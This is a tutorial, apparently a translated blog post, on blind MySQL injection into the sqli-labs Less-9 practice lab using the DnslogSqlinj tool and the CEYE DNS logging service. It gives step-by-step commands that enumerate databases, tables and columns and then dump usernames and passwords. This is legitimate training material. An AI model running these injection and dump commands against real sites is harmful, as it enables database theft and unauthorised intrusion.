MySQL injection - blind injection - Dnslog automation (tool) injection

#Involving tools and environment construction

Tool download

https://github.com/ADOOO/DnslogSqlinj

CEYE - Monitor service for security testing (dns domain name interface)

use kail

python.2.7 environment

pip2 install vent==1.2.2

pip2 install termcolor

Note: pip installation termcolor failure solution_termcolor installation_B1aK2's blog-CSDN blog

If the termcolor installation fails, you can check the solution in the above article

Enter directly in the terminal of kail:

pip2 install vent==1.2.2

pip2 install termcolor

ready to install

 #CCYE＋DnslogSqlinj use

First register an account in CCYE

Click on the upper right corner to open the main interface

There are ldentifier and API Token, which we will need later

Open kail and enter the directory of DnslogSqlinj-master

Edit the config.py file

Enter the previous CCYE information into it

Lentifier corresponds to Dnsurl

apitoken corresponds to apitoken

#Automation statement structure

#Demo case

1. First open the program

Command: sudo python dnslogSql.py

 

2. Get all databases

play load:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs

Injection statement:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs

?id=1' and ({}) --+ --dbs

?id=1' --+ First of all, determine its closing method and use ' closure, because this tool will not help you automatically detect which injection points are there, so you need to find the injection point first and determine its closing method .

and ({}): ({}) This place is where the injection instruction is placed, the injected statement

--dbs : resolve all library names

When we hit enter, he will send the ({}) injection statement to the target website location http://192.168.222.142

Get data count: There are currently 9 databases

The above is all the databases of the target website

3. Get all the table names of the specified database (specify to view the security database)

paly load:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables

injection statement

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables

 After pressing Enter, he will get all the table names of the specified data table

Show a total of 4 tables

 4. Get the column name (view all field information (columns) of the specified data table "users")

play load

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns

statement:

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns

 

 At this point, all the field information of the users data table will come out.

5. Drag library (view all information of username and password)

paly load

python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" -C "username,password" --dump